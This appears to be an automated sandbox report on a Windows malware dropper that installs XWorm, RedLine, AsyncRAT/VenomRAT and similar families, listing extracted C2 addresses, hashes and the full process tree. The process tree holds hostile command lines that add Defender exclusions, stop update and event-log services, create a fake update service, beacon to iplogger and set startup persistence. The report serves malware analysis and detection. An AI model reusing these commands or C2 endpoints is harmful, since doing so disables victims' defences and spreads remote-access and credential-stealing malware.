Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-10-2024 19:01

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

C2

163.5.215.245:9049

Mutex

r3SLo8kx59hai6gX

aes.plain

Extracted

Family

redline

Botnet

Pizdun

C2

94.142.138.219:20936

Attributes
  • auth_value

    20a1f7fe6575c6613ee7cc5d3025af70

Extracted

Family

agenttesla

Credentials

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Receiving + Grabber v6.0.4

Botnet

NewClient

C2

157.20.182.183:4449

Mutex

fsqshvwapaxdhwtdp

Attributes
  • delay

    1

  • install

    false

  • install_file

    Winup.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • VenomRAT 1 IoCs

    Detects VenomRAT - JaffaCakes118.

  • Venomrat family
  • Windows security bypass 2 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 41 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Executes dropped EXE
    PID:1204
    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2148
      • C:\Users\Admin\AppData\Local\Temp\Files\a14.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\a14.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\CDCA.tmp\CDCB.tmp\CDDC.ps1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2312
      • C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c pHash.bat
          4⤵
            PID:340
        • C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild8.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild8.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "TraderBro770.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
            4⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2980
            • C:\Users\Admin\AppData\Local\Temp\1.exe
              "1.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1720
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1756
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 76
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:1844
            • C:\Users\Admin\AppData\Local\Temp\2.exe
              "2.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2140
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 88
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2168
            • C:\Users\Admin\AppData\Local\Temp\TraderBro770.exe
              "TraderBro770.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1904
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2056
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 40
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2496
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2936
        • C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1900
        • C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2912
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            4⤵
              PID:2808
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                • Drops file in Windows directory
                PID:1752
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop UsoSvc
              4⤵
              • Launches sc.exe
              PID:1808
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop WaaSMedicSvc
              4⤵
              • Launches sc.exe
              PID:780
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop wuauserv
              4⤵
              • Launches sc.exe
              PID:824
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop bits
              4⤵
              • Launches sc.exe
              PID:688
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop dosvc
              4⤵
              • Launches sc.exe
              PID:2012
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe delete "WindowsUpdate"
              4⤵
              • Launches sc.exe
              PID:2836
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
              4⤵
              • Launches sc.exe
              PID:928
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop eventlog
              4⤵
              • Launches sc.exe
              PID:2016
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe start "WindowsUpdate"
              4⤵
              • Launches sc.exe
              PID:1988
          • C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:1584
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat
              4⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2408
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                5⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2872
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3012
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                5⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1464
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 347861
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2784
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "systemadaptermeetingskenneth" Grow
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2192
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b ..\Officer + ..\Essays + ..\Cool + ..\Prompt + ..\Itunes G
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1844
              • C:\Users\Admin\AppData\Local\Temp\347861\Councils.pif
                Councils.pif G
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1492
                • C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1440
              • C:\Windows\SysWOW64\choice.exe
                choice /d y /t 5
                5⤵
                • System Location Discovery: System Language Discovery
                PID:664
          • C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1500
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:384
          • C:\Users\Admin\AppData\Local\Temp\Files\a.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\a.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:2360
            • C:\Windows\sysvplervcs.exe
              C:\Windows\sysvplervcs.exe
              4⤵
              • Windows security bypass
              • Executes dropped EXE
              • Windows security modification
              • System Location Discovery: System Language Discovery
              PID:2388
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2892
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2484
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2508
                • C:\Windows\SysWOW64\sc.exe
                  sc stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1904
                • C:\Windows\SysWOW64\sc.exe
                  sc stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1064
                • C:\Windows\SysWOW64\sc.exe
                  sc stop wuauserv
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2368
                • C:\Windows\SysWOW64\sc.exe
                  sc stop DoSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2984
                • C:\Windows\SysWOW64\sc.exe
                  sc stop BITS /wait
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1772
          • C:\Users\Admin\AppData\Local\Temp\Files\connector1.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\connector1.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1956
        • C:\Windows\SysWOW64\cmd.exe
          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & echo URL="C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & exit
          2⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2664
      • C:\ProgramData\Windows11\Updater.exe
        C:\ProgramData\Windows11\Updater.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
            PID:2392
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              3⤵
              • Drops file in Windows directory
              PID:1048
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            2⤵
            • Launches sc.exe
            PID:2796
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            2⤵
            • Launches sc.exe
            PID:2280
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            2⤵
            • Launches sc.exe
            PID:344
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            2⤵
            • Launches sc.exe
            PID:2520
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            2⤵
            • Launches sc.exe
            PID:2072
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:3048
            • C:\Windows\system32\svchost.exe
              svchost.exe
              2⤵
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2264

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            69095754bbe2f08afb39185a7c93a22f

            SHA1

            66bcb5322233051705c1c8fe2038ab4f5999ad85

            SHA256

            fb3e22e570efde1dc185e8f1dd4c8c9099bc77d32970963acad82ee4ae7f66c6

            SHA512

            2e313dcc9177200777ad8412ebd358d67f595514de009482236b08971c8fcb4001dde18aff7e4749858db378990bf5b8356370fc9cec6ca49702a9f0b31e59de

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            f5af5fbd465a80a1ffdef831a9c4ad5a

            SHA1

            f03aa2333fe39f6474a8f35bb3c1d931c11d8532

            SHA256

            4588d1d90900d918044517a7b8c334daf6d877527e185794ea32c54b9a3d4bfb

            SHA512

            3d6d630447a54efdd7f4df519a2b36bdd6d4d90f462b0c9c050388dd606455db5360ba9da4988e93517243bc0e4a9234d9352fd13f9b33b614817b4d7829efa1

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            feaa96b5e88c662e8a5a46b56af545b3

            SHA1

            da608cb2ea0742bbf94fcce440b06369460be2f2

            SHA256

            b1c67cb28f2906c1d18dd6ea17c121dbb91c4499d79b3cec3d958859ef59ed23

            SHA512

            7644a6698d3114f4d2efa9d0da996c6f46b4c4d58bc21e5d7678fce370e598c460476ce1d89eb9c81d25da82f26a26fe6d35f947530f42d8314e306b5ec0de8f

          • C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.scr

            Filesize

            872KB

            MD5

            18ce19b57f43ce0a5af149c96aecc685

            SHA1

            1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

            SHA256

            d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

            SHA512

            a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PLSLTMYI\download[1].htm

            Filesize

            1B

            MD5

            cfcd208495d565ef66e7dff9f98764da

            SHA1

            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

            SHA256

            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

            SHA512

            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

          • C:\Users\Admin\AppData\Local\Temp\1.exe

            Filesize

            284KB

            MD5

            95d5aa97a3c15cee24aad800cc169d2b

            SHA1

            2ace4e384316f6aba1a77fbea5a30d73259760d6

            SHA256

            1a56132c232842530d78edb6d0ce387b98995e2912df0075d74db9b2f9aa3770

            SHA512

            5e024d56d44f1de22e201bc91d4a125bc1d3a6f0ef005d6213a5256decd1ff52a8abb77f2fbaa8304dcdeb21e4f4ed4bd0008858e6a2ab5a04943985ab02ddbe

          • C:\Users\Admin\AppData\Local\Temp\2.exe

            Filesize

            1.1MB

            MD5

            1a2b16c17517d602806431c0744f5f8f

            SHA1

            465e2d6bd37972295cd017f78f35faa07102ab4e

            SHA256

            d52c40b759d5c215ab4090e972038dd6bdcad31c56d72d9a25ed6e76f3f952f1

            SHA512

            a5bf48dcdc3bde33d919f5e65c183d5fb12cb671497d990dcce38f353bf6546aa0dd4d258e6c7e5b735a47c532a405eeecb78d146afce4382c5e72b2ccffc4bd

          • C:\Users\Admin\AppData\Local\Temp\Attacked

            Filesize

            16KB

            MD5

            6ef8c1c2b28c05eaeac6e46b3040e369

            SHA1

            e95b0727b83d7093562ed5605cec43a4ef999d55

            SHA256

            9b49261b378ff83d4deba60b2340d42f374cde941167951600029d9083ba48e7

            SHA512

            9a125ab0f47d9637542d1ec582ede4b0acf547e31756d0989e91fc8b638e37611d8dd6f01c6a11f209ee77a11f2a928163fe7b6a8f28b86d0b79cfe913fa505d

          • C:\Users\Admin\AppData\Local\Temp\CDCA.tmp\CDCB.tmp\CDDC.ps1

            Filesize

            740B

            MD5

            22dc53962d540ea7f5b1c0136d6692a6

            SHA1

            e48f5b886c8fb54f1c78479d0b456e704900e61a

            SHA256

            d8a521d33228a8b545dc2fd29455a2c366795edbfc6a0eb72162a3291539327f

            SHA512

            c754ea47725437e5c0659b42da93edeba4693ff964298865897ab52af0c436d1bc946a9305311f4481ace38e38c677f555bd97a030ab82537e4648e67046f3b5

          • C:\Users\Admin\AppData\Local\Temp\CabBF3C.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe

            Filesize

            2.6MB

            MD5

            61d3abff46a6bd2946925542c7d30397

            SHA1

            1fed80a136e67a5b7b6846010a5853400886ee9c

            SHA256

            b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa

            SHA512

            e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

          • C:\Users\Admin\AppData\Local\Temp\Files\a.exe

            Filesize

            96KB

            MD5

            930c41bc0c20865af61a95bcf0c3b289

            SHA1

            cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

            SHA256

            1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

            SHA512

            fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

          • C:\Users\Admin\AppData\Local\Temp\Files\a14.exe

            Filesize

            85KB

            MD5

            6917037b3307cd41e28175a327299d4d

            SHA1

            fa814d1d43b2031ba7b2464de255a5837692fd0c

            SHA256

            9fa501e984cc0d7c2c178af9e7c8a3c93f0bfc7ba6075c93f216249ee327e2ed

            SHA512

            bd5fdefacbbdd46f780ec5fefbb129c2a5ee376dca00a57dea5c18781ae519e63c9adb957ee066842d416f7f467ff32e91267e99456acc3e76e710b58f722cd4

          • C:\Users\Admin\AppData\Local\Temp\Files\connector1.exe

            Filesize

            72KB

            MD5

            32282cfa34ebd3aa220bb196c683a46e

            SHA1

            4299a9a8e97a6ad330c1e0e2cc3368834a40f0cb

            SHA256

            3c3ce0355bfa42b379830b93a76cffd32fceed54e6b549ae4a1132ca30b392ff

            SHA512

            b567f434a313d270a53945a75d3303db179964faabde22786b37e8399b03d2ab664f11d03f93f5e22ea1aa8b38b1481fcdd302e688c5c1e9c3f1e3516ceebfb4

          • C:\Users\Admin\AppData\Local\Temp\Files\pHash.bat

            Filesize

            204B

            MD5

            fb85840f1be69e173fd917e7561c4457

            SHA1

            be87644d997bbfbb26542397d2b812cc47696a9b

            SHA256

            fc73cb2ecd77fb5f14af112cff3dcc5b400f52d2fd825e5cc3d22f35b2e8031e

            SHA512

            26054fb71c88cea7379dd9431fd79402454e3e7f9dff7c6526aa950b60083dd727f4352fe437d5a6fc3b1c2b74b6360c2b9c8727006ef7d316c7e86ec23af03b

          • C:\Users\Admin\AppData\Local\Temp\Grow

            Filesize

            2KB

            MD5

            3c9f8ff4a787de0add5ea18b3c90aeec

            SHA1

            906ebcd1a5b5b34169b3312c57b478b7eb2acfa9

            SHA256

            555da9eb7911ddc494fed580e6ea21988b13e917f76206e00707176797db190b

            SHA512

            f321713b684334a6ee674680bda1cb45b82c9a2385ce0257f44823d7acedb9390638dc267dc55fa73647b074ee7d7c062c98284b90d9ae9aad9128bb0a303765

          • C:\Users\Admin\AppData\Local\Temp\TarBF5E.tmp

            Filesize

            181KB

            MD5

            4ea6026cf93ec6338144661bf1202cd1

            SHA1

            a1dec9044f750ad887935a01430bf49322fbdcb7

            SHA256

            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

            SHA512

            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

          • C:\Users\Admin\AppData\Local\Temp\Titled

            Filesize

            870KB

            MD5

            acf1ef48885709dbc83533ee0425c52f

            SHA1

            d0ef7d02f7610a7e0121bc80b828158e18cd2f65

            SHA256

            4f9208638d6a49b70e5192c525792edcdb1bb06ab403cdc5b93a357b5ba3bee2

            SHA512

            2de5ab5f7e71dd12973040ae6f3a53df71fc746ce4874d41fd8123be3fe24c0f9fa8444b07f89b03d4132ac14c40891e3b84885d62278bce62b2b0db0b0cd7bb

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            6d86b31c3c7a99fb3bcb0150964c9a72

            SHA1

            b372eb51b07f3dce58d7fe9998decb1604acdadd

            SHA256

            208ea62b5cd0f86e448a593653ee1cd504275336883901230bd33e6b27658e45

            SHA512

            20717997d7b0bd5e8e0d42f35f56541f4d5ac555f79c07b89ff51982e7f68b150e0e728109f289c3b1347fc7a53df5c83121551567083938dc076a3d9d9b6024

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            50f3e7771e1f021d51ad30b973ead3b4

            SHA1

            b4678d3578873149c3cea4373021c49e91f6c8ac

            SHA256

